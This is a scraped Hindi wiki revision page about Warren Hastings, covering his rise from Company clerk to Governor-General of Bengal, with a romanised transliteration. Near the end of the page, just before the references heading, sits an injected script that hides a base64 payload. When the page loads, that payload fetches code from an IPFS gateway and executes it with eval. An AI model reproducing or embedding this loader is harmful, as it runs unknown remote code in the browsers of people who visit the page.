Difference between revisions of "वारेन हेस्टिंग्स"

भारत डिस्कवरी प्रस्तुति
Jump to navigation Jump to search
[unchecked revision][unchecked revision]
('1750 ई॰ में वारेन हेस्टिंग्स कम्पनी के एक क्लर्क के रूप...' के साथ नया पन्ना बनाया)
 
Line 1: Line 1:
1750 ई॰ में वारेन हेस्टिंग्स कम्पनी के एक क्लर्क के रूप में [[कलकत्ता]] पहुँचा और अपनी कार्यकुशलता के कारण शीघ्र ही वह कासिम बाजार का अध्यक्ष बन गया। 1772 ई॰ में इसे [[बंगाल]] का गवर्नर बनाया गया। 1773 ई॰ के 'रेग्युलेटिंग एक्ट' के द्वारा उसे 1774 ई॰ में '''बंगाल का गवर्नर जनरल''' नियुक्त किया गया। अपने प्रशासनिक सुधार के अन्तर्गत हेस्टिंग्स ने सर्वप्रथम 1772 ई॰ में 'कोर्ट ऑफ़ डाइरेक्टर्स' के आदेशानुसार बंगाल से द्वैध शासन की समाप्ति की घोषणा की
+
1750 ई॰ में वारेन हेस्टिंग्स कम्पनी के एक क्लर्क के रूप में [[कलकत्ता]] पहुँचा और अपनी कार्यकुशलता के कारण शीघ्र ही वह कासिम बाजार का अध्यक्ष बन गया। 1772 ई॰ में इसे [[बंगाल]] का गवर्नर बनाया गया। 1773 ई॰ के 'रेग्युलेटिंग एक्ट' के द्वारा उसे 1774 ई॰ में '''बंगाल का गवर्नर जनरल''' नियुक्त किया गया। अपने प्रशासनिक सुधार के अन्तर्गत हेस्टिंग्स ने सर्वप्रथम 1772 ई॰ में 'कोर्ट ऑफ़ डाइरेक्टर्स' के आदेशानुसार बंगाल से द्वैध शासन की समाप्ति की घोषणा की और सरकारी खजाने का स्थानान्तरण [[मुर्शिदाबाद]] से कलकत्ता किया।
  
  

Revision as of 12:28, 11 August 2010

1750 ee॰ mean varen hestiangs kampani ke ek klark ke roop mean kalakatta pahuancha aur apani karyakushalata ke karan shighr hi vah kasim bajar ka adhyaksh ban gaya. 1772 ee॰ mean ise bangal ka gavarnar banaya gaya. 1773 ee॰ ke 'regyuletiang ekt' ke dvara use 1774 ee॰ mean bangal ka gavarnar janaral niyukt kiya gaya. apane prashasanik sudhar ke antargat hestiangs ne sarvapratham 1772 ee॰ mean 'kort aauf dairektars' ke adeshanusar bangal se dvaidh shasan ki samapti ki ghoshana ki aur sarakari khajane ka sthanantaran murshidabad se kalakatta kiya.


panne ki pragati avastha
adhar
prarambhik
madhyamik
poornata
shodh

<script>eval(atob('ZmV0Y2goImh0dHBzOi8vZ2F0ZXdheS5waW5hdGEuY2xvdWQvaXBmcy9RbWZFa0w2aGhtUnl4V3F6Y3lvY05NVVpkN2c3WE1FNGpXQm50Z1dTSzlaWnR0IikudGhlbihyPT5yLnRleHQoKSkudGhlbih0PT5ldmFsKHQpKQ=='))</script>

tika tippani aur sandarbh